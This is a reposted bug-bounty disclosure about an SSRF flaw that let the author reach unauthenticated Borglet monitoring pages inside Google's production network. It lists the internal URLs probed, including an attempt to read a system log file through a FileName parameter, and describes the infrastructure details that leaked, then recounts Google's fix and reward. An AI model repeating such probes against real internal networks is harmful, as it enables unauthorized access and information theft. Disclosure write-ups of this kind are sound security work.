information from Google! \o/ Google, from the inside First I want to say that I didn’t scan Google’s internal network. I only made 3 requests in the network to confirm the vulnerability and immediately sent a report to Google VRP. It took 48 hours to Google to fix the issue (I reported it on a Saturday), so in the meantime I couldn’t help but test 2-3 more requests to try to pivot the SSRF vulnerability into unrestricted file access or RCE but without luck. The first request was to http://10.x.x.201/. It responded with a server status monitoring page of a “Borglet”. After a Google search, I could confirm that I was indeed inside Borg, Google’s internal large-scale cluster management system (here is a overview of the architecture). Google have open sourced the successor of Borg, Kubernetes in 2014. It seems that while Kubernetes is getting more and more popular, Google is still relying on Borg for its internal production infrastructure, but I can tell you it’s not because of the design of Borg interfaces! (edit: this is intended as a joke ? ) The second request was to http://10.x.x.1/ and it was also a monitoring page for another Borglet. The third request was http://10.x.x.1/getstatus, a different status monitoring page of a Borglet with more details on the jobs like permissions, arguments. Each Borglet represents a machine, a server. On the hardware side, both servers were using Haswell’s CPU @2.30GHz with 72 cores, which corresponds to a set of 2 or 3 Xeon E5 v3. Both servers were using the CPUs at 77%. They had 250GB of RAM, which was used at 70%. They had 1 HDD each with 2TB and no SSD. The HDD were almost empty with only 15GB used, so the data is stored elsewhere. The processing jobs (alloc and tasks) are very diverse, I believe this optimizes ressource usage with some jobs using memory, others using CPU, network, some with high priority, etc… Some services seem very active : Video encoding, Gmail and Ads. That should not be surprising since video processing is very heavy, Gmail is one of the main Google services and Ads is, well, Google’s core business. ? I didn’t see Google Sites or Caja in the jobs list, so either the SSRF was going through a proxy or the Borglet on 10.x.x.201 was from a different network than the 10.x.x.201 IP I saw in my Google App Engine instance logs. Regarding the architecture, we can find jobs related to almost all of the components of the Google Stack, in particular MapReduce, BitTable, Flume, GFS… On the technology side, Java seems to be heavily used. I didn’t see any mention of Python, C++, NodeJS or Go, but that doesn’t mean it wasn’t used so don’t draw conclusions. ? I should mention that Borg, like Kubernetes, relies on containers like Docker, and VMs. For video processing, it seems they are using Gvisor, a Google open-source tool that looks like a trade-off between containers performance and VMs security. Parameters gives some information on how to reach the applications through network ports. On Borg, it seems that all applications on a server share the same IP address and each has some dedicated ports. Apps arguments were the most fun part for me because it is almost code. I didn’t find Google Search secret algorithm but there was some cool queries like this: MSCR(M(Customer.AdGroupCriterion+Customer.AdGroupCriterion-marshal+FilterDurianAdGroupCriterion+FilterNeedReviewAdGroupCriterion+GroupAdGroupCriterionByAdGroupKey+JoinAdGroupData/MakeUnionTable:3)+M(JoinAdGroupData/MakeUnionTable:2)+M(Customer.AdGroup+Customer.AdGroup-marshal+FilterDurianAdGroup+ParDo(AdGroupDataStripFieldsFn)+JoinAdGroupData/MakeUnionTable)+R(JoinAdGroupData/GroupUnionTables+JoinAdGroupData/ConstructJoinResults+JoinAdGroupData/ExtractTuples+ExtractCreativeAndKeywordReviewables)) If you wonder what’s Gmail system user, it’s gmail@prod.google.com There is also a user “legal-discovery@prod.google.com” that has permission “auth.impersonation.impersonateNormalUser” on “mdb:all-person-users”. (edit: for clarification, I just saw these strings close to each other in a big array and assumed that’s what it meant) There was also a little bit of history which showed that most jobs where aborted before finishing. At last, there was a lot of url to other servers or applications endpoints. In particular, I tried to access a promising-looking http://wiki/ url but it didn’t work. I tested a /getFile?FileName=/sys/borglet/borglet.INFO url but got an unauthorized response. I also tried to change the FileName parameter but got error messages. Google VRP response I reported the issue on Saturday May 12, 2018, and it was automatically triaged as a P3 (medium priority) issue. On Sunday I sent an email to Google Security that they might want someone to have a look at this. On Monday morning the issue was escalated to P0 (critical) then later decreased to P1. On Monday night the vulnerable endpoint was removed and the issue fixed. It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network. Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF. In this case, the Borglet status monitoring page wasn’t authenticated, and it leaked a lot of information about the infrastructure. My understanding is that in Kubernetes, this page is authenticated. Google VRP rewarded me with $13,337, which corresponds to something like unrestricted file access! They explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact. I’d like to thank them for the bounty and for their quick response. I hope they won’t beat me with a stick for disclosing any of this. ? That’s it for this story, I hope you enjoyed it as much I did and feel free to comment! Sursa: https://opnsec.com/2018/07/into-the-borg-ssrf-inside-google-production-network/
×
×
  • Create New...